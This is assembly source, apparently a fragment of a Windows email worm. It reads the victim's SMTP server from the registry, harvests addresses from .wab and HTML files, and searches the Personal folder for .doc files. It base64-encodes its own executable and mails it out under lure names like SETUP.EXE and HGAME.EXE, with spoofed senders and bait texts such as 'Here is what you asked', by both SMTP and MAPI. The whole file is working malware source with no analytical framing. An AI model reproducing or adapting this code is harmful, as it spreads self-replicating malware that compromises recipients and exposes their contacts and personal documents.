	call    	SendSocket					; 3� Write '>',CRLF

	call    	GetServeurReply                 	; Ok
	jc		Error_CloseSocket&CleanUp       	; No

SendDataCmd:
	mov		esi,offset cmd_data             	; 'DATA',CRLF
	push    	6                               	; Size
	pop		ecx                             	; Size
	call    	SendSocket					; send DATA command
	call    	GetServeurReply                 	; Ok
	jc		Error_CloseSocket&CleanUp       	; No

SendeMailBody:
	mov		esi, dword ptr[MemMessageBody1] 	; Start Message Body
	mov		ecx, dword ptr[MessageSize1]
	call    	SendSocket               

      mov     	esi,dword ptr [MemEncoded]		; Encoded File
      mov     	ecx,dword ptr [EncodedFileSize]
	call    	SendSocket       

	mov		esi, offset MessageBody2        	; End Message Body
	mov		ecx, MessageSize2
	call    	SendSocket                     

SendTermCmd:
	mov		esi,offset cmd_term             	; CRLF,'.',CRLF
	push    	5                               	; size
	pop		ecx                             	; size
	call    	SendSocket					; send message header+body
	call    	GetServeurReply                 	; Ok ?
	jc		Error_CloseSocket&CleanUp       	; No

SendQuitCmd:
	mov		esi,offset cmd_quit             	; 'QUIT',CRLF
	push    	6                               	; size
	pop		ecx                             	; size
	call    	SendSocket					; send QUIT command
	popad
      clc
	ret

SendSocket:
	push   	0                               	; Flags
	push    	ecx                             	; size
	push    	esi                             	; Source
	push    	[hSocket]                       	; Handle
	api     	send
	ret


;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;........................ Minor Sub Routine ..................................
;............................ Z O N E ........................................
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


;........................ Open & Map a File ..................................
;.............................................................................


; IN:			TempPath&Name = Path + Name of file to Open
; OUT:		fhandle, maphandle, mapaddress
;			cf = 0 ou 1

Open&MapFile:
      xor     	eax,eax
      push    	eax
      push    	FILE_ATTRIBUTE_NORMAL
      push    	OPEN_EXISTING
      push    	eax
      push    	FILE_SHARE_READ
      push    	GENERIC_READ or GENERIC_WRITE		
      push    	Offset TempPath&Name
      api     	CreateFileA
      inc     	eax
      je      	Open&MapFileError
      dec     	eax
      mov     	dword ptr [fhandle], eax

      xor     	eax,eax
      push    	eax
      push    	eax
      push    	eax                             
      push    	PAGE_READWRITE	            	
      push    	eax
      push    	dword ptr [fhandle]
      api     	CreateFileMappingA
      or      	eax,eax                       
      jz      	Open&MapFileCloseFileHandle
      mov     	dword ptr [maphandle],eax

      xor     	ebx,ebx
      push    	ebx                             
      push    	ebx
      push    	ebx
      push    	FILE_MAP_WRITE				
      push    	eax
      api     	MapViewOfFile
      or      	eax,eax                         	
      jz      	Open&MapFileCloseMapHandle
      mov     	dword ptr [mapaddress], eax	
	clc
	ret								

Open&MapFileUnmapView:  
      push    	dword ptr [mapaddress]          	
      api     	UnmapViewOfFile

Open&MapFileCloseMapHandle: 
      push    	dword ptr [maphandle]           	
      api     	CloseHandle

Open&MapFileCloseFileHandle: 
      push    	dword ptr [fhandle]            	
      api     	CloseHandle     
Open&MapFileError:
	stc
	ret

;...................... Search Personal Documents ............................
;.............................................................................

; OUT			- Personal Doc Path in Mem in $ [PersoDocListe]

PersonalDocSearch:
      xor     	eax,eax
      push    	PAGE_READWRITE                  	; read/write page
	push    	MEM_RESERVE or MEM_COMMIT
	push    	PersoFileSize
	push    	eax                             	; System decide where 
	api     	VirtualAlloc
	test		eax, eax
	je		PersonalDocSearchError
      mov     	dword ptr[PersoDocListe], eax

      call    	Clear_TempPath&Name     
        
	push    	00h
	push    	05h						; Personal Path	      
	push    	offset TempPath&Name
	push    	00h
	api		SHGetSpecialFolderPathA

	push    	offset TempPath&Name
	api     	SetCurrentDirectoryA			; Selected dir = Personal Path

	lea		eax, FindPersonalFile
	mov		dword ptr[RoutineToCall], eax
	call    	AllSubDirSearch				; Action = FindPersonalFile
PersonalDocSearchError:
	ret	  

;.............. Search Personal File

FindPersonalFile:       
	cmp		dword ptr[NbPersonalFound], NbPersoWanted  ; Enought Perso File
	je		NoMorePersonalFile
           
	push    	offset search
      @pushsz 	"*.doc"                        
      api     	FindFirstFileA

      mov     	dword ptr [PersonalSearchHandle], eax
      inc     	eax
      jz		NoMorePersonalFile

PersonalDocumentFound:
	mov		edi, dword ptr[PersoDocListe]
	mov		edx, dword ptr[NbPersonalFound]
	rol		edx, 8
	add		edi, edx					; Right Pos

	push		edi
	push		260
	api		GetCurrentDirectoryA			; The dir

	@pushsz	'\'
	push		edi
	api		lstrcat					; The \

	push		offset [search.FileName]
	push		edi
	api		lstrcat					; The Name

	inc		dword ptr[NbPersonalFound]		; Next One
	cmp		dword ptr[NbPersonalFound], NbPersoWanted  ; Enought Perso File
	je		EnoughtPerso

FindPersonalFileNext:
	push    	offset search
	push		dword ptr [PersonalSearchHandle]
	api		FindNextFileA
	
	test		eax, eax
	jnz		PersonalDocumentFound

EnoughtPerso:
	push		dword ptr [PersonalSearchHandle]
	api		FindClose

NoMorePersonalFile:  
	ret

;.............. Search in all Sub Dir + Action in ............................

; IN:			- Root dir Selected for the Search begin
;			- RoutineToCall = SeekHtmlCurrentDir
; OUT: 		- What perform RoutineToCall in all subdir of selected Root


AllSubDirSearch:
	xor     	ebx,ebx                         	

FindFirstDir:
      lea    	edi, search                    
	push    	edi
      @pushsz 	"*.*"                        
      api     	FindFirstFileA

      mov     	dword ptr [RecSearchHandle],eax 	

      inc     	eax
      jz      	FirstDirNotFound

DirTravel:
      bt      	word ptr[search.FileAttributes],4 	
      jnc     	FindNextDir                     
                                                
      lea     	eax,[search.FileName]

	cmp     	byte ptr [eax],"."              	
      jz      	FindNextDir                   

      push    	eax                             	
      api     	SetCurrentDirectoryA

InNewDir_Action:
	pushad
	call    	dword ptr[RoutineToCall]		; THE Action    
	popad

	push    	dword ptr [RecSearchHandle]     	
	inc     	ebx                             
	jmp     	FindFirstDir
FindNextDir:
	push    	edi                             	
	push    	dword ptr [RecSearchHandle]
      api     	FindNextFileA

      or      	eax,eax                         	
      jnz     	DirTravel                       	

FirstDirNotFound:
      @pushsz 	".."                            	
      api     	SetCurrentDirectoryA            

	or      	ebx,ebx                         	
      jz      	AllSubDirSearchEnd              	
	
	dec     	ebx                             	
	pop     	dword ptr [RecSearchHandle]
	jmp     	FindNextDir

NextDirNotFound:
      push    	dword ptr [RecSearchHandle]          
      api     	FindClose
	jmp     	FirstDirNotFound

AllSubDirSearchEnd:
	ret

;.......................... Random Number ....................................

; IN:   		Edi
; OUT:  		Random Number in EDX: 0 <-> Edi-1

GetRndNumber:
      push    	eax ebx ecx esi esp ebp
        
      mov     	eax, dword ptr[RandomNb]
      mov     	ecx,41C64E6Dh
      mul     	ecx
      add     	eax,00003039h
      mov     	dword ptr[RandomNb], eax
                      
      xor     	edx, edx
      div     	edi                             	; Reste < Edi in EDX
               
      pop     	ebp esp esi ecx ebx eax          
      ret

;......................... Free The Mem ......................................

FreeTheMem:
	mov		ecx, dword ptr[EmailList]
	jecxz		FreeTheMemNext1
	call		MemFreeIt

FreeTheMemNext1:
	mov		ecx, dword ptr[MemMessageBody1]
	jecxz		FreeTheMemNext2
	call		MemFreeIt

FreeTheMemNext2:
	mov		ecx, dword ptr[PersoDocListe]
	jecxz		FreeTheMemFin
	call		MemFreeIt

FreeTheMemFin:
	ret

MemFreeIt:
	push		00008000h					; MEM_RELEASE
	push		0
	push		ecx
	api		VirtualFree
	ret

;..................... Clear TempPath & Name .................................

Clear_TempPath&Name:
       xor     	al,al
       mov     	ecx,260
       lea     	edi,TempPath&Name                	; Clear the path
       rep     	stosb
       ret

;..................... Encode File Base 64 ...................................

; IN:   		Path of the file in offset MyPath
; OUT:		Encoded file in Mem

CodeB64File:

OpenFileToEncode:
      xor     	eax,eax
      push    	eax
      push    	FILE_ATTRIBUTE_NORMAL
      push    	OPEN_EXISTING
      push    	eax
      push    	FILE_SHARE_READ
      push    	GENERIC_READ
      push    	Offset MyPath				; The file to encode
      api     	CreateFileA
      inc     	eax
      je      	CodeB64FileEnd
      dec     	eax
      mov     	dword ptr [TempFileHandle], eax

GetFileToEncodeSize:
	push		0
	push		eax
	api		GetFileSize	
	inc		eax
      je      	CodeB64FileEnd
	dec		eax
	mov		dword ptr [OurSizeToEncode], eax

	add		eax, 1000					; Security

GetMemToReadFileToEncode:
      xor     	ebx,ebx
      push    	PAGE_READWRITE                  	; read/write page
	push    	MEM_RESERVE or MEM_COMMIT
	push    	eax
	push    	ebx                             	; System decide where 
	api     	VirtualAlloc
	test		eax, eax
	je		CodeB64FileEnd
	mov		dword ptr[MemToEncode], eax

ReadFileToEncode:
	push    	00h
	push    	offset ByteReaded
      push    	dword ptr [OurSizeToEncode]
      push    	eax
      push    	dword ptr [TempFileHandle]
      api		ReadFile
	
	push		dword ptr [TempFileHandle]
	api		CloseHandle

GetMemToEncodeFile:
	mov		eax, dword ptr [OurSizeToEncode]
	rol		eax, 4					; We need ori size *3 (+security)
	xor     	ebx,ebx
      push    	PAGE_READWRITE                  	; read/write page
	push    	MEM_RESERVE or MEM_COMMIT
	push    	eax
	push    	ebx                             	; System decide where 
	api     	VirtualAlloc
	test		eax, eax
	je		CodeB64FileEnd
	mov		dword ptr[MemEncoded], eax

AlignFileToEncodeSize:
	mov		eax, dword ptr [OurSizeToEncode]
      push    	3
      pop     	ecx
      xor     	edx,edx                        
      push    	eax
      div     	ecx
      pop     	eax
      sub     	ecx,edx
      add     	eax,ecx					; align size to 3

EncodeFileNow:
      xchg    	eax,ecx
      mov     	edx,dword ptr [MemEncoded]
      mov     	eax,dword ptr [MemToEncode]
      call    	encodeBase64

      mov     	dword ptr [EncodedFileSize],ecx
	
CodeB64FileEnd:
	ret


;................... Encode Base 64 Algorithme ...............................

encodeBase64:							; By Bumblebee
; input:
;       		EAX = Address of data to encode
;       		EDX = Address to put encoded data
;       		ECX = Size of data to encode
; output:
;       		ECX = size of encoded data
;
      xor     	esi,esi
      call    	over_enc_table
      db      	"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
      db      	"abcdefghijklmnopqrstuvwxyz"
      db      	"0123456789+/"
over_enc_table:
      pop     	edi
      push    	ebp
      xor     	ebp,ebp
baseLoop:
      movzx   	ebx,byte ptr [eax]
      shr     	bl,2
      and     	bl,00111111b
      mov     	bh,byte ptr [edi+ebx]
      mov     	byte ptr [edx+esi],bh
      inc     	esi

      mov     	bx,word ptr [eax]
      xchg    	bl,bh
      shr     	bx,4
      mov     	bh,0
      and     	bl,00111111b
      mov     	bh,byte ptr [edi+ebx]
      mov     	byte ptr [edx+esi],bh
      inc     	esi

      inc     	eax
      mov     	bx,word ptr [eax]
      xchg    	bl,bh
      shr     	bx,6
      xor     	bh,bh
      and     	bl,00111111b
      mov     	bh,byte ptr [edi+ebx]
      mov     	byte ptr [edx+esi],bh
      inc     	esi

      inc     	eax
      xor     	ebx,ebx
      movzx   	ebx,byte ptr [eax]
      and     	bl,00111111b
      mov     	bh,byte ptr [edi+ebx]
      mov     	byte ptr [edx+esi],bh
      inc     	esi
      inc     	eax

      inc     	ebp
      cmp     	ebp,24
      jna     	DontAddEndOfLine

      xor     	ebp,ebp                         
      mov     	word ptr [edx+esi],0A0Dh
      inc     	esi
      inc     	esi
      test    	al,00h                          
      org     	$-1
DontAddEndOfLine:
      inc     	ebp
      sub     	ecx,3
      or      	ecx,ecx
      jne     	baseLoop

      mov     	ecx,esi
      add    	edx,esi
      pop     	ebp
      ret

;-----------------------------------------------------------------------------
;------------------------------ Data Zone ------------------------------------
;-----------------------------------------------------------------------------

.data


;-------------------------- Variables Zone -----------------------------------

SmtpFlag        	db  	0		; Select Mapi or Smtp
PayloadFlag		db	0		; Payload = 1
UserEmailFoundFlag db	0		; found = 1

;...................... Encode B64 Variables

EncodedFileSize	dd	0
MemEncoded		dd	0
MemToEncode		dd	0
OurSizeToEncode	dd	0
ByteReaded        dd    0

;...................... Email SMTP Variables

Reg               dd    1 			; String 
KeySize           dd    0 			; Size to read with SHGetValue 
                                  		; (init it + return effectiv lenght read in)

AccountKey        db    'Software\Microsoft\Internet Account Manager\Accounts\'
AccountSubKey     db    64 dup (0)

SmtpServeur       db	64 dup (0)   	; smtp server found with regkey


wsocket 	      dw	2	      	; sin_family ever AF_INET
		      dw	?             	; the port
ServeurIP	      dd	?	      	; addr of server node
			db	8 dup (?)     	; not used 


hSocket           dd    0               	; Socket Handle   

ServeurReply	dd	?			; error code
ServeurReplyEnd	db	?			; byte for LF


CRLF              equ   <13,10>
	
cmd_helo	      db	'HELO Support',CRLF
cmd_mailfrom	db	'MAIL FROM:<'
cmd_rcptto	      db	'RCPT TO:<'

cmd_data	      db	'DATA',CRLF
cmd_term	      db	CRLF,'.',CRLF
cmd_quit	      db	'QUIT',CRLF


MemMessageBody1	dd	0			; Ptr on Mem where built header
MessageSize1    	dd	0			; Size Header + bordel Mime

MessageBody1:	db	'Mime-Version: 1.0',CRLF
			db	'Content-Type: multipart/mixed; boundary="--123"',CRLF,CRLF

			db	'----123',CRLF
			db	'Content-Type: text/plain; charset=us-ascii',CRLF
			db	'Content-Transfer-Encoding: 7bit',CRLF,CRLF,0

			;	Text part

MessageBody1b:	db	'----123',CRLF
                	db      'Content-Type: application/octet-stream; name=',0 ; filename part
MessageBody1c:  	db      'Content-Transfer-Encoding: base64',CRLF
                	db      'Content-Disposition: attachment; filename=',0    ; filename part

			;	Encoded part

MessageBody2:	db	10,'--123--',CRLF
MessageSize2    	equ  	$-MessageBody2


RndFileName1	db	'"SETUP.EXE"',0
RndFileName2	db	'"HGAME.EXE"',0
RndFileName3	db	'"MININET.EXE"',0
RndFileName4	db	'"NETAV.EXE"',0
RndFileNameTb	dd	offset RndFileName1, offset RndFileName4, offset RndFileName3
			dd	offset RndFileName4, offset RndFileName2
NbRndFileName	equ	($-offset RndFileNameTb)/4 

RndText1:		db	'Hi ',CRLF
			db	'Here is what you asked, bye. ',CRLF,0
RndText2:		db	'Hello ',CRLF
			db	'Maybe you could help me with this, bye. ',CRLF,0
RndText3:		db	'Hello ',CRLF
			db	'Now you can try it, bye. ',CRLF,0

RndTextTb		dd	offset RndText1, offset RndText2, offset RndText3
NbRndText		equ	($-offset RndTextTb)/4

RndSubject1		db	'Hello',0
RndSubject2		db	'For you',0
RndSubject3		db	'Try it',0
RndSubject4		db	'Re:',0
RndSubjectTb:	dd	offset RndSubject2, offset RndSubject1, offset RndSubject4	
			dd	offset RndSubject3, offset RndSubject4
NbSubject		equ	($-offset RndSubjectTb)/4

RndFromName1	db	'morgan',0
RndFromName2	db	'mick',0
RndFromName3	db	'carla',0
RndFromName4	db	'eva',0
RndFromNameTb:	dd	offset RndFromName1, offset RndFromName2, offset RndFromName3
			dd	offset RndFromName4	
NbFromName		equ	($-offset RndFromNameTb)/4
				
RndFromServ1	db	'@caramail.com',0
RndFromServ2	db	'@hotmail.com',0
RndFromServ3	db	'@aol.com',0
RndFromServTb:	dd	offset RndFromServ1, offset RndFromServ2, offset RndFromServ3
NbFromServ		equ	($-offset RndFromServTb)/4


;...................... Email MAPI Variables

IConnectedStateTemp     dd      0         ; For InternetConnectedState

MapiMessage       equ   $
                  dd    ?
                  dd    offset subject
                  dd    offset textmail
                  dd    ?
                  dd    offset date
                  dd    ?
                  dd    2
                  dd    offset MsgFrom
                  dd    1
                  dd    offset MsgTo
                  dd    1
                  dd    offset MapiFileDesc

MsgFrom           equ   $
                  dd    ?
                  dd    ?
                  dd    offset namefrom
                  dd    offset mailfrom
                  dd    ?
                  dd    ?

MsgTo             equ   $
                  dd    ?
                  dd    1
                  dd    offset nameto
                  dd    offset CurrentEmail
                  dd    ?
                  dd    ?

MapiFileDesc      equ   $
                  dd    ?
                  dd    ?
                  dd    ?
                  dd    offset MyPath   ; File to attache
                  dd    ?
                  dd    ?

CurrentEmail      db    EmailSize dup (0)
MAPISession       dd    0

subject           db    'Hello',0

date              db    '',0

namefrom          db    '',0

mailfrom          db    EmailSize dup (0)

nameto            db    '',0

textmail          db    'Hi ',CRLF
                  db    'Here is what you asked, bye... ',0


;...................... Residency + Dump Variables

MutexHdl          dd  	0
MyPath            db    260 dup (0)
TempFileHandle    dd    0
ByteWritten       dd    0

;...................... Email Search Variables

NbEmailFound      dd    0       		; Compte combien d'email found
EmailList         dd    0       		; Ptr zone Mem ou stocker Emails 
                                                            
TempPath&Name     db    260 dup (0)

fhandle           dd    0       		; To find & map file
mapaddress        dd    0
maphandle         dd    0                

maphandlemail     dd    0       		; for html found         
esi_save          dd    0
EmailCurrentPos   dd    0

RandomNb          dd    0       		; Init with GettickCount

NbWabEmail        dd    0       		; Nb emails in *.Wab

;...................... Recursive Search Variables

RecSearchHandle 	dd 	0			; For the Recursive search
RoutineToCall	dd	0			; Ptr on routine to execute in all SubDir

PersonalSearchHandle	dd	0		; For personal doc search
NbPersonalFound	dd	0			; Nb Personal doc found
PersoDocListe	dd	0			; Ptr zone Mem ou stocker Path Doc Perso 

;--------------------------- Structures Zone ---------------------------------

;...................... Search File Structure

filetim         	struct
FT_dwLowDateT     dd      ?
FT_dwHighDateT    dd      ?
filetim         	ends

w32fd           struct
FileAttributes    dd      ?
CreationTime      filetim ?
LastAccessTime    filetim ?
LastWriteTime     filetim ?
FileSizeHigh      dd      ?
FileSizeLow       dd      ?
Reserved0         dd      ?
Reserved1         dd      ?
FileName          db      260 dup (0)
AlternateFileN    db      13 dup (?)
                  db      3 dup (?)
w32fd           	ends

search            w32fd   ?

;...................... System Time Structure

SystemTimeData    equ   $ 
STDYear           dw    ?
STDMonth          dw    ?
STDDayOfWeek      dw    ?
STDDay            dw    ?
STDHour           dw    ?
STDMinute         dw    ?
STDSecond         dw    ?
STDMilliseconds   dw   	?

;...................... Sockets Structure

WSAData           equ   $      
            	dw	?
			dw	?
			db	257 dup (?)
			db	129 dup (?)
			dw	?
			dw	?
			dd	?


end Mv